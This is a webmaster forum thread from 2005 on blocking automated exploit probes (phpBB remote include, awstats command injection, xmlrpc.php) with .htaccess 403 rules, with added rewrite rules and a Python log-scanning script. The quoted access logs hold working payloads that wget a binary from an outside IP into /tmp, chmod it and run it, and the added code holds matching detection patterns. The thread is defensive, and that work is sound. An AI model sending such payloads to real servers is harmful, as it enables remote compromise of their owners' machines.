how to block this type of request in htaccess

GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_

tito

2:36 pm on Dec 17, 2005 (gmt 0)

10+ Year Member



Hello,

I've been searching the forum but couldn't find anything. I'm finding loads of logs like this:

"GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.xx.#*$!/cmd.gif?&cmd=cd
%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo¦ HTTP/1.1" 404 1227 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

"POST /xmlrpc.php HTTP/1.1" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

etc., like this:
"POST /blog/xmlrpc.php
"POST /drupal/xmlrpc.php
etc..

All coming from different IPs. How could I block this type of request in .htaccess?

Thanks in advance

[edited by: jdMorgan at 3:18 pm (utc) on Dec. 17, 2005]
[edit reason] Fixed side-scroll [/edit]

jdMorgan

2:54 pm on Dec 17, 2005 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member




RewriteRule xmlrpc\.php - [NC,F]

Jim

tito

3:09 pm on Dec 17, 2005 (gmt 0)

10+ Year Member



Thank you Jim,

Do you think it can also be done as a RedirectMatch permanent, like this?

<IfModule mod_rewrite.c>
RedirectMatch permanent (.*)\/xmlrpc\/\.\.(.*)$ [microsoft.com...]
</IfModule>

jdMorgan

3:37 pm on Dec 17, 2005 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



The proper response is a 403 or a 501.

Your code won't work properly, because you need to check for mod_alias.c if you're going to use RedirectMatch.


<IfModule mod_alias.c>
RedirectMatch 403 xmlrpc\.php
</IfModule>

For anyone reading this thread: Using a 301 redirect to handle malicious attempts on your server is dangerous and somewhat irresponsible, because most bad-bots don't follow redirects...

And if the bad-bot *does* follow your redirect:

  • It makes the target (Microsoft in this case) think *your server* may be the source of this exploit, since you're the referer
  • It only wastes more internet bandwidth, slowing down the Web for everybody

The same goes for redirecting hotlinking or any other exploit. If you try to get 'tricky' or 'take revenge,' you're likely to get yourself in trouble. You probably don't want Microsoft to report your server's IP address to the IBL or other public IP address blacklists, right?

Just 403 these attempts and be done with it.

Jim

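An added example, not Jim's code or anything posted in the thread: one .htaccess that answers 403 for the paths quoted so far, in both the mod_alias form Jim shows and the mod_rewrite form from his first reply. Because RedirectMatch only ever tests the URL path, the mod_rewrite block also checks the query string for the remote-include and shell-command strings seen in the logged requests. The patterns, the assumption that AllowOverride allows FileInfo for this directory, and the assumption that /cgi-bin is not an Alias or ScriptAlias owned by the host (in which case, as Jim says, a .htaccess here cannot affect it) are mine:

```apache
# Added example, not from the thread. Assumes AllowOverride FileInfo (or All)
# for this directory and that /cgi-bin is not an Alias/ScriptAlias directory
# owned by the host; a .htaccess cannot touch an aliased directory.

# mod_alias form. RedirectMatch tests only the URL path, never the query
# string, so it covers the xmlrpc.php / awstats.pl probes but not a payload
# sent to a script that really exists.
<IfModule mod_alias.c>
    RedirectMatch 403 xmlrpc\.php$
    RedirectMatch 403 awstats\.pl$
    RedirectMatch 403 /cgi-bin(/|$)
</IfModule>

# mod_rewrite form of the same blocks, plus query-string checks.
# [NC] = case-insensitive match, [F] = answer 403 (implies [L]).
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteRule (^|/)(xmlrpc\.php|awstats\.pl)$ - [NC,F]
    RewriteRule ^cgi-bin(/|$) - [NC,F]
    # %{QUERY_STRING} is not URL-decoded, so the encoded forms are tested too:
    # a remote URL in phpbb_root_path, a pipe after configdir=, or a
    # ";wget" / ";chmod" / ";curl" command fragment anywhere in the query.
    RewriteCond %{QUERY_STRING} (^|&)phpbb_root_path=https?(:|%3A) [NC,OR]
    RewriteCond %{QUERY_STRING} (^|&)configdir=(%7C|\|) [NC,OR]
    RewriteCond %{QUERY_STRING} (^|;|%3B|\||%7C)(%20|\+)*(wget|curl|chmod)(%20|\+) [NC]
    RewriteRule .* - [F]
</IfModule>
```

The body of the 403 is whatever ErrorDocument 403 points at, so keeping that page small is what actually saves bandwidth. A quick check from another machine is `curl -sI 'http://yourhost/xmlrpc.php'`, which should show `HTTP/1.1 403` once the file is in place; if it still shows 404 for a path under /cgi-bin, that directory is most likely aliased outside the .htaccess scope.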
tito

3:53 pm on Dec 17, 2005 (gmt 0)

10+ Year Member

Thank you for the explanations Jim, I'll go for a 403.
tito

tito

4:04 pm on Dec 18, 2005 (gmt 0)

10+ Year Member

Please Jim, if I also have to block a dir. like cgi-bin etc., would it be fine like this?

<IfModule mod_alias.c>
RedirectMatch 403 cgi-bin
</IfModule>

If I also type \.php or \.html etc. after it, does it mean that both the dir. name and file names with those extensions are blocked?

Thanks in advance,
tito

tito

5:04 pm on Dec 19, 2005 (gmt 0)

10+ Year Member

I'm trying different options to stop such requests. This one from Jim is working and it serves a 403:

<IfModule mod_alias.c>
RedirectMatch 403 xmlrpc\.php
</IfModule>

So I've tried to add the following to also stop this type of request:
/awstats/awstats.pl?configdir=¦echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20
%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo¦

or

/cgi-bin/awstats/awstats.pl?configdir=¦echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons
%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo¦

<IfModule mod_alias.c>
RedirectMatch 403 xmlrpc\.php
RedirectMatch 403 awstats\.pl
</IfModule>

but it doesn't show a 403 on these awstats requests.
Please, what am I doing wrong?

Thanks so much,
tito

[edited by: jdMorgan at 6:41 pm (utc) on Dec. 19, 2005]
[edit reason] Fixed side-scroll [/edit]

jdMorgan

6:43 pm on Dec 19, 2005 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member

If awstats exists in directory /cgi-bin, and if directory /cgi-bin is an "alias" directory owned by your hosting company, then your .htaccess file cannot affect requests to that directory. See Apache mod_alias.

That's the only reason I can think of that your code would not work.

Jim

py9jmas

6:54 pm on Dec 19, 2005 (gmt 0)

10+ Year Member

Is there any point 'blocking' these requests? The only effect this will have is that instead of receiving a 404 error, the client will get a 403 error. The client doesn't care - it's an automated program.

You are making your configuration more complex for no increase in security.

tito

8:38 pm on Dec 19, 2005 (gmt 0)

10+ Year Member

Hello Jim,

It's my own server: Apache/2.0.52 (BlueQuartz).
There is no cgi-bin dir., but there is an awstats/ dir. with the file awstats.pl. But I'd also like to block requests to cgi-bin even if it doesn't exist, just to give a 403 instead of a 404.

The problem here is that I'm getting a huge number of such PHP vulnerability attacks [isc.sans.org...]

I have been digging the forum and found a very nice workaround you posted [webmasterworld.com...]
but it seems that I can't make it work, so the only chance for me is to use RedirectMatch 403 as above.
The problem is that I can't block the requests to awstats with RedirectMatch 403 awstats\.pl; actually I can block the xmlrpc\.php only.

I wonder how I should block (403) those specific requests to awstats as mentioned above.

Hello py9jmas,
These requests are so many that serving a 404 is consuming a lot of bandwidth. I have a very nice 403 (1kb) instead that I'd like to serve to them.
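As an added example that is not part of the thread, a small Python script that reads access-log lines like the ones quoted in the first post and in the awstats post above, flags the xmlrpc.php, awstats.pl and phpbb_root_path probes plus shell-command fragments in any query string, and totals the bytes served per status code, which is the bandwidth figure tito is worried about. The sample log lines, rule names and IP addresses are constructed for the example (documentation-range IPs, not real hosts):

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log in Apache combined format, modelled on the lines
# quoted in the thread. IPs and download hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Dec/2005:14:30:01 +0000] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://203.0.113.9/cmd.gif?&cmd=cd%20/tmp;wget%20203.0.113.9/criman;chmod%20744%20criman;./criman;echo%20YYY;echo HTTP/1.1" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.7 - - [17/Dec/2005:14:30:02 +0000] "POST /xmlrpc.php HTTP/1.1" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.7 - - [17/Dec/2005:14:30:03 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.33 - - [19/Dec/2005:17:01:10 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20203.0.113.9%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo| HTTP/1.1" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.50 - - [19/Dec/2005:17:02:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# One combined-format line: client, identd, user, time, request, status,
# bytes, referer, user agent. The request target is anything without spaces.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# (label, path pattern, decoded-query pattern or None). Labels are my own.
PROBE_RULES = [
    ("xmlrpc", re.compile(r"/xmlrpc\.php$", re.I), None),
    ("awstats_cmdinj", re.compile(r"/awstats\.pl$", re.I),
     re.compile(r"configdir=.*[|;]", re.I)),
    ("phpbb_rfi", re.compile(r"admin_styles\.php", re.I),
     re.compile(r"phpbb_root_path=https?://", re.I)),
]

# Generic catch-all: a download or chmod command right after a separator.
SHELL_RE = re.compile(r"(^|[;|&\s])(wget|curl|chmod)\s", re.I)


def classify(target: str):
    """Return a probe label for a request target, or None if it looks benign."""
    path, _, query = target.partition("?")
    decoded_query = unquote(query)  # logs carry the still-encoded form
    for label, path_re, query_re in PROBE_RULES:
        if path_re.search(path) and (query_re is None or query_re.search(decoded_query)):
            return label
    if SHELL_RE.search(decoded_query):
        return "shell_in_query"
    return None


def summarise(log_text: str) -> dict:
    """Count flagged requests by label and source IP, and bytes served per status."""
    by_label, by_ip, bytes_by_status = Counter(), Counter(), Counter()
    unparsed = 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = LOG_RE.match(line)
        if m is None:
            unparsed += 1
            continue
        label = classify(m["target"])
        if label is None:
            continue
        by_label[label] += 1
        by_ip[m["ip"]] += 1
        size = 0 if m["bytes"] == "-" else int(m["bytes"])
        bytes_by_status[m["status"]] += size
    return {
        "by_label": dict(by_label),
        "by_ip": dict(by_ip),
        "bytes_by_status": dict(bytes_by_status),
        "unparsed": unparsed,
    }


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Run it against a real log with `summarise(open("access_log").read())`; the per-IP counter is what you would feed a firewall or fail2ban-style rule, and the bytes-per-status total shows how much of the served volume is going to requests that deserve a short 403 rather than the full 404 page.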